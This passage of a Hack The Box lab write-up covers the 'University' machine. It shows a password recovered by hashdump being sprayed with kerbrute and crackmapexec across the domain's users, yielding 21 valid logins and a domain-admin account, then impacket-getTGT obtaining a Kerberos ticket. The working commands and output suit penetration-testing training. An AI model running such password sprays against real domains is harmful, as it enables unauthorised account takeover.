Password Spray

A CLEARTEXT credential has been obtained through hashdump; v3ryS0l!dP@sswd#X

KDC

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ kerbrute passwordspray --dc dc.university.htb -d UNIVERSITY.HTB users.txt 'v3ryS0l!dP@sswd#X'
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 11/03/24 - Ronnie Flathers @ropnop
 
2024/11/03 01:51:27 >  Using KDC(s):
2024/11/03 01:51:27 >  	dc.university.htb:88
 
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 A.Crouz@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Arnold.G@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Emma.H@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Choco.L@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 C.Freez@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Alice.Z@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 George.A@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Brose.W@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 hana@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Jakken.C@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 John.D@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 karma.watterson@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Kareem.A@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Leon.K@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Kai.K@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Lisa.K@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:28 >  [+] VALID LOGIN:	 Karol.J@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 >  [+] VALID LOGIN:	 Nya.R@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 >  [+] VALID LOGIN:	 Martin.T@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 >  [+] VALID LOGIN:	 Rose.L@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 >  [+] VALID LOGIN:	 Steven.P@UNIVERSITY.HTB:v3ryS0l!dP@sswd#X
2024/11/03 01:51:30 >  Done! Tested 26 logins (21 successes) in 2.400 seconds

It would appear that almost every user in the domain shares the same password; v3ryS0l!dP@sswd#X

SMB

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ crackmapexec smb $IP -u users.txt -p 'v3ryS0l!dP@sswd#X' --continue-on-success
SMB         10.10.11.39     445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:university.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.39     445    DC               [+] university.htb\A.Crouz:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [-] university.htb\Administrator:v3ryS0l!dP@sswd#X STATUS_LOGON_FAILURE 
SMB         10.10.11.39     445    DC               [+] university.htb\Alice.Z:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Arnold.G:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Brose.W:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\C.Freez:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Choco.L:v3ryS0l!dP@sswd#X (Pwn3d!)
SMB         10.10.11.39     445    DC               [+] university.htb\Emma.H:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\George.A:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [-] university.htb\Guest:v3ryS0l!dP@sswd#X STATUS_LOGON_FAILURE 
SMB         10.10.11.39     445    DC               [+] university.htb\hana:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Jakken.C:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\John.D:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Kai.K:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Kareem.A:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\karma.watterson:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Karol.J:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [-] university.htb\krbtgt:v3ryS0l!dP@sswd#X STATUS_LOGON_FAILURE 
SMB         10.10.11.39     445    DC               [+] university.htb\Leon.K:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Lisa.K:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Martin.T:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Nya.R:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Rose.L:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [+] university.htb\Steven.P:v3ryS0l!dP@sswd#X 
SMB         10.10.11.39     445    DC               [-] university.htb\WAO:v3ryS0l!dP@sswd#X STATUS_LOGON_FAILURE 
SMB         10.10.11.39     445    DC               [-] Connection Error: The NETBIOS connection with the remote host timed out.

The same result can be seen against the SMB server choco.l is a DA user

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ impacket-getTGT 'UNIVERSITY.HTB/choco.l@dc.university.htb' -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: v3ryS0l!dP@sswd#X
[*] Saving ticket in choco.l@dc.university.htb.ccache

TGT generated for the choco.l user Moving on to Privilege Escalation

InfoSec LAB

Explorer

University_Password_Spray

Password Spray

KDC

SMB

Validation

Interactive Graph View

Table of Contents

Backlinks